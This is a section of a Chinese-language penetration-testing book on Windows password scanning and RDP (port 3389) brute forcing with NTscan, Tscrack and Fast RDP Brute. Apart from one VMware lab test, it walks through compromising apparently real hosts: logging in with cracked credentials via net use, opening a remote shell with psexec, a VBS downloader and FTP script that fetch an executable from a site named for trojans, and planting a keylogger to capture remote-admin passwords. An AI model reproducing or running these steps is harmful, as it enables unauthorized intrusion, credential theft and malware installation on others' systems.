- 網絡攻防實戰研究:漏洞利用與提權
- 祝烈煌
- 3934字
- 2019-11-18 15:09:32
2.4 Windows口令掃描及3389口令暴力破解
在Windows操作系統滲透過程中,除了SQL注入、Web服務漏洞攻擊等方式外,還有一種攻擊方式,即暴力破解。通過對3389或者內網的服務器進行口令掃描攻擊,可以獲取更多的服務器權限。這種攻擊經常發生在擁有一臺或者多臺服務器權限后。目前常用的口令掃描工具有Hscan、NTscan等。本節主要介紹如何進行口令掃描,以及如何利用Tscrack、Fast RDP Brute等工具軟件來暴力破解3389口令,最終獲取服務器權限。
2.4.1 口令掃描準備工作
在進行口令掃描前需要做一些準備工作,收集的信息越多,越有可能成功獲取內網服務器權限。例如,在掌握一定的權限后,通過郵箱賬號等信息進行社工密碼收集,對用戶的密碼進行規律分析和社工字典生成。
① 確定需要掃描的IP地址或者IP地址段。
② 收集用戶名和密碼。盡管以Administrator為用戶名的情況較多,但在內網中,很多用戶都喜歡使用個性化的名字,因此需要收集一些用戶名。密碼字典的整理尤其重要,包括網站使用過的密碼、社工庫郵件地址或者通過用戶名查詢到的密碼、公司名稱、電話號碼、出生日期、手機號碼、QQ號碼等。
③ 編輯密碼和口令配置文件。
2.4.2 使用NTscan掃描口令
Windows口令掃描攻擊主要針對某個IP地址或者某個網段進口令掃描,實質是通過139、445等端口嘗試建立連接,利用的是DOS命令“net use\\\ipaddress\admin$ "password"/u:user”,只不過通過程序來實現而已。下面的案例通過掃描軟件NTscan來掃描口令,在得到口令后成功地實施了控制。
1.設置NTscan
直接運行NTscan,在NTscan中一般只需要設置開始和結束IP地址,其他設置均可采用默認,如圖2-18所示。
圖2-18 設置NTscan
說明
如果是在肉機上精細管理掃描,由于語言版本的不同,如果操作系統不支持中文,就有可能顯示為亂碼,這個時候就只能憑熟悉度來進行設置了。本例是在英文操作系統中使用NTscan,在其運行界面中一些漢字雖然顯示為“? ”,但是不影響掃描,如圖2-19所示。
圖2-19 NTscan亂碼顯示
在NTscan中有IPC、SMB和WMI共3種掃描方式,第1種和第3種方式掃描口令較為有效,第2種主要用來掃描共享文件。利用IPC$可以與目標主機建立一個空的連接而無須用戶名與密碼,而且可以得到目標主機上的用戶列表。SMB(服務器信息塊)協議是一種IBM協議,用于在計算機間共享文件、打印機、串口等。SMB協議可以用在因特網的TCP/IP協議之上,也可以用在其他網絡協議(例如IPX和NetBEUI)之上。
WMI(Windows管理規范)是Windows的一項核心管理技術。WMI作為一種規范和基礎結構,可以訪問、配置、管理和監視幾乎所有的Windows資源。例如,用戶可以在遠程計算機器上啟動一個進程,設定一個在特定日期和時間運行的進程,遠程啟動計算機,獲得本地或遠程計算機中已安裝程序的列表,查詢本地或遠程計算機的Windows事件日志等。一般情況下,在本地計算機上執行的WMI操作也可以在遠程計算機上執行,只要用戶擁有該計算機的管理員權限即可。如果用戶對遠程計算機擁有權限且遠程計算機支持遠程訪問,那么用戶就可以連接該遠程計算機并執行相應權限的操作了。
2.執行掃描
在NTscan界面中單擊“開始”按鈕或者單擊左窗口下方的第1個按鈕(如果顯示為亂碼),開始掃描,如圖2-20所示。
圖2-20 掃描口令
說明
NTscan掃描口令與字典有關,其原理是將字典中的口令與實際口令進行對比,如果相同即可建立連接(即破解成功)。破解成功后會在下方顯示提示信息。
NTscan的字典文件為NT_pass.dic,用戶文件為NT_user.dic,可以根據實際情況對字典文件和用戶文件內容進行修改。
NTscan掃描結束后,會在NTscan程序的當前目錄下生成一個NTscan.txt文件,該文件中記錄了掃描結果,如圖2-21所示。
圖2-21 NTscan掃描記錄文件
在NTscan中還有一些輔助功能,例如單擊右鍵后可以在彈出的快捷菜單中執行“連接”、“打開遠程登錄”及“映射網絡驅動器”等命令,如圖2-22所示。
圖2-22 NTscan輔助功能
3.實施控制
在DOS命令提示符下輸入“net use\\\221.*.*.*\admin$ "mrs6100"/u:administrator”命令,獲取主機的管理員權限。命令執行成功,如圖2-23所示。
圖2-23 建立連接
4.執行psexec命令
輸入“psexec\\\221.*.*.* cmd”命令獲取一個DosShell,如圖2-24所示。
圖2-24 獲取DOSShell
說明
以上兩步可以合并,直接在DOS命令提示符下輸入“psexec\\\ipaddress-u administrator-ppassword cmd”命令。例如,在上例中可以輸入“psexec\\\221.*.*.*-u Administrator-pmrs6100 cmd”命令來獲取一個DOS下的Shell。
在有些情況下,“psexec\\\ipaddress-u administrator-ppassword cmd”命令無法正常執行。
5.從遠端查看被入侵計算機的端口開放情況
使用“sfind-p 221.*.*.*”命令查看遠程主機端口開放情況,該主機僅開放了4899端口,如圖2-25所示。
圖2-25 查看端口開放情況
6.上傳文件
在該DOSShell下執行文件下載命令,將一些工具軟件或者木馬軟件上傳到被攻擊計算機中,如圖2-26所示。
圖2-26 上傳文件
說明
可以使用以下vbs腳本命令上傳文件。
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.
xmlhttp") >>dl.vbe
echo web.open "get", .arguments(0),0:web.send:if web.status^>200 then quit
>>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile.
arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe
如果不能通過執行vbs腳本上傳文件,可以通過執行ftp命令上傳文件。ftp命令如下。
echo open 192.168.1.1 >b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get systeminfo.exe >>b
echo bye >>b
ftp -s:b
7.查看主機基本信息
執行“systeminfo info”命令可以查看被入侵計算機的基本信息(該計算機操作系統為Windows 2000 Professional),如圖2-27所示。
圖2-27 查看主機基本信息
8.進行滲透
在本案例中,由于對方計算機安裝有Radmin,因此極有可能保留了Radmin的控制信息。通過“開始”→“程序”→“Remote Administrator v2.2”→“Remote Administrator viewer”選項打開Radmin 2.0的客戶端控制器,其中有兩個IP地址,如圖2-28所示,不過不知道連接密碼。安裝一個鍵盤記錄工具,等待用戶自己連接。監聽到用戶的鍵盤記錄后,就可以將用戶的控制端作為肉機了(這種肉機質量很高)。
圖2-28 獲取Radmin控制端信息
2.4.3 使用Tscrack掃描3389口令
3389終端攻擊主要通過3389破解登錄器(Tscrack)實現。Tscrack是微軟遠程終端服務(3389)的測試產品,后來有人將其做了一些修改,可以用來破解3389口令。其核心原理是利用字典配合遠程終端登錄器嘗試登錄,一旦登錄成功,則認為破解成功。破解成功于否主要取決于字典強度和時間長度。在成功進入內網后,借助該方法可以對內網3389服務器進行滲透。該方法對Windows 2000 Server的攻擊效果較好。
1.安裝Tscrack軟件
初次運行Tscrack時需要進行安裝(直接運行tscrack.exe程序)。如果不能正常運行,則需要運行“tscrack-U”命令卸載Tscrack中的組件以后再運行tscrack.exe。運行成功后,會提示安裝組件、解壓縮組件、注冊組件成功,如圖2-29所示。
圖2-29 安裝Tscrack程序
2.尋找開放3389端口的IP地址
在DOS提示符下輸入“sfind-p 220.*.*.*”,探測其端口開放情況,如圖2-30所示。
圖2-30 探測端口
3.構建字典文件
構建字典文件100words.txt,在其中加入破解口令,每個口令占用一行,且行尾無空格。編輯完成后,如圖2-31所示。
圖2-31 構建字典文件
4.編輯破解命令
如果僅對單個IP地址進行破解,其破解命令格式為“tscrack ip-w 100words.txt”。如果是對多個IP地址進行破解,則可以將IP地址整理成一個TXT文件,每個IP地址占一行,且行尾無空格,將其保存為ip.txt,然后編輯一個批命令,如圖2-32所示。
圖2-32 編輯破解命令
說明
·程序tscrack.exe可以被更改為任意名稱。100words.txt也可以是任意名稱。
·如果是對多個IP地址進行破解,則字典文件不能太大,否則破解時間會很長。建議針對單一的IP地址進行破解。
5.破解3389口令
運行批命令后,遠程終端破解程序開始破解。Tscrack會使用字典中的口令逐一進行嘗試,程序自動輸入密碼,如圖2-33所示。在程序破解過程中不要進行手動干涉,要讓程序自動進行破解。
圖2-33 破解口令
6.破解成功
破解成功后,程序會自動結束,顯示破解的口令和破解該口令所花費的時間,如圖2-34所示。
圖2-34 口令破解成功
說明
· Tscrack破解3389終端口令后不會生成日志文件,破解的口令顯示在DOS窗口中,一旦DOS窗口關閉,所有結果都不會保存。
·如果是對多個IP地址進行3389終端口令破解,Tscrack程序會對所有IP地址進行破解嘗試后才停止。
· Tscrack破解3389終端口令所對應的用戶只能是Administrator,對其他用戶無能為力。
7.使用口令登錄
運行mstsc.exe,打開終端連接器,輸入IP地址進行連接。在3389連接界面中輸入剛才得到的密碼和Administrator用戶,連接成功,如圖2-35所示。
圖2-35 進入遠程終端桌面
8.總結
本案例通過Tscrack程序來破解遠程終端(3389)的口令,只要字典足夠強大、時間足夠長,如果對方未采取IP地址登錄限制等安全措施,則其口令在理論上是可以破解的。不過,在微軟發布升級補丁后,該方法僅對Window 2000 Server效果較好,對Windows Server 2003及以上版本效果不佳。應對3389遠程終端口令破解的安全措施是進行IP地址信任連接,或者通過一些軟件來限制只有某些IP地址才能訪問遠程終端。
2.4.4 使用Fast RDP Brute暴力破解3389口令
1.軟件簡介
Fast RDP Brute是俄羅斯的Roleg開發的一款暴力破解工具,主要用于掃描遠程桌面、連接弱口令,其官方網站下載地址為http://stascorp.com/load/1-1-0-58。運行軟件后,界面如圖2-36所示。
圖2-36 程序主界面
2.設置主要參數
· Max threads:設置掃描線程數,默認為1000,一般不用修改。
· Scan timeout:設置超時時間,默認為2000,一般不用修改。
· Thread timeout:設置線程超時時間,默認為60000,一般不用修改。
· Scan ports:設置要掃描的端口,根據實際情況設置,默認為3389、3390和3391。在實際掃描過程中,如果是對某個已知IP地址和端口進行掃描,建議刪除多余端口。例如,已知對方端口為3388,則只保留3388即可。
· IP ranges to scan:設置掃描的IP地址范圍。
用戶名和密碼可以在文件夾中的user.txt和pass.txt文件內自行設置。如圖2-37所示,在默認的user.txt中包含俄文的管理員信息,一般用不上,可以根據實際情況進行設置。
圖2-37 設置暴力破解的用戶名和密碼字典
3.局域網掃描測試
本次測試采用VMware搭建了兩個平臺。掃描主機IP地址為192.168.148.128;被掃描主機IP地址為192.168.148.132,操作系統為Windows Server 2003,開放3389端口。在該服務器上新建立test、antian365用戶,并將設置的密碼復制到掃描字典中,單擊“Start Scan”按鈕進行掃描,掃描結果如圖2-38所示。
圖2-38 掃描成果
注意
· 192.168.148.132服務器必須開啟3389端口。
·在掃描服務器上執行mstsc命令,輸入IP地址192.168.148.132進行3389登錄測試,看看能否訪問網絡。如果無法訪問網絡,掃描就無效。
4.總結與思考
該軟件雖然提供了多個用戶同時掃描的機制,但只要掃描出一個結果,軟件就停止掃描。對于多用戶掃描,可以在掃描出結果后,將已經掃描出來的用戶刪除,然后繼續進行掃描,或者針對單個用戶進行掃描。
掃描時間過長或者連接次數較多時,會顯示“too many errors”錯誤,如圖2-39所示。
圖2-39 掃描錯誤
該軟件可以對單個用戶進行已知密碼掃描。在已經獲取內網權限的情況下,可以對整個網絡開放3389端口的主機進行掃描,以獲取權限。
對DUBrute V4.2 RC進行3389密碼暴力破解測試,測試環境同上,實際測試結果為無法破解。